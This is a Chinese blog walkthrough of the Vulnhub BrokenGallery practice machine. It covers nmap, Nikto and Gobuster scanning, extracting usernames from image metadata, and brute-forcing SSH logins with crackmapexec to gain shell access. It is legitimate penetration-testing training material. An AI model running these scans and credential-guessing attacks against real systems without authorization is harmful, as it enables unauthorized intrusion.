Vulnhub-BrokenGallery

BrokenGallery靶机

 

1.主机发现

arp-scan -l

image

2.端口扫描

nmap --min-rate 10000 -p- 192.168.48.129    #使用10000速率进行全端口扫描
nmap -sU --min-rate 10000 -p- 192.168.48.129    #使用UDP协议以10000速率进行全端口扫描
nmap -sT -sV -A - O -p22,80 192.168.48.129   #使用TCP协议扫描开放的端口及版本信息,带有攻击性和探测操作系统版本,指定22和80端口
nmap --script=vuln -p22,80 192.168.48.129   #使用默认脚本扫描

image

3.Nikto漏洞扫描

nikto -host http://192.168.48.129

image

4.Gobuster目录扫描

gobuster dir -u http://192.168.48.129/ \
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-x php,txt,html,js,php.bak,html.bak,txt.bak,json,git,git.bak,zip,zip.bak --wildcard switch

image

5.查看网站信息

curl -iL http://192.168.48.129/     #查看网站源码
curl -iL http://192.168.48.129/gallery.html

image

image

image

6.把文件和图片都下载下来

wget http://192.168.48.129/README.md
wget http://192.168.48.129/img_5terre.jpg
wget http://192.168.48.129/img_forest.jpg
wget http://192.168.48.129/img_lights.jpg
wget http://192.168.48.129/img_mountains.jpg

file README.md              #查看文件格式是text
strings README.md           #使用strings查看文件内容发现是16进制字节码
xxd -r -ps README.md > README.bin  #使用xxd把十六进制文件转换为二进制文件
-r:用于十六进制进制转换二进制
-p:输出十六进制编码,不包括其他信息
-s:跳过文件的前 N 个字节
file README.bin             #查看文件格式是JPEG

image

image

image

7.查看图片隐写并提取信息

exiftool README.jpeg
exiftool img_5terre.jpg 
exiftool img_forest.jpg
exiftool img_lights.jpg
exiftool img_mountains.jpg

Bob
bob
BROKEN
broken
Cheers
cheers
avrahamcohen.ac
5terre
forest
lights
mountains
img_5terre
img_forest
img_lights
img_mountains

image

8.尝试SSH暴力破解

cat ssh.txt		#创建文件把提取的信息放到文件中
crackmapexec ssh 192.168.48.129 -u ssh.txt -p ssh.txt --continue-on-success
ssh:协议
-u:指定用户字典
-p:指定密码字典
--continue-on-success:爆破出结果仍继续爆破
结果为broken:broken

image

image

9.连接SSH

ssh broken@192.168.48.129

image

 

总结:
1.进行主机发现找到目标靶机
2.对IP进行端口扫描发现22和80端口
3.使用Nikto进行简单的漏洞扫描
4.使用Gobuster进行网站目录扫描
5.查看网站并查看源码发现有一个README.md和几张图片
6.我们把文件和图片都下载下来,查看文件属性和图片隐写
7.发现README.md是十六进制用xxd还原为二进制文件发现是图片
8.图片并没有特别明显的提示,有一些用户名等信息
9.我们把图片中类似于用户名的信息都提取出来(包括大小写)做成字典
10.使用crackmapexec进行用户名密码碰撞,成功获取broken:broken成功的提示
11.连接SSH成功获取broken用户的权限

posted @ 2025-09-26 11:28  我真的是黑帽子  阅读(12)  评论(0)    收藏  举报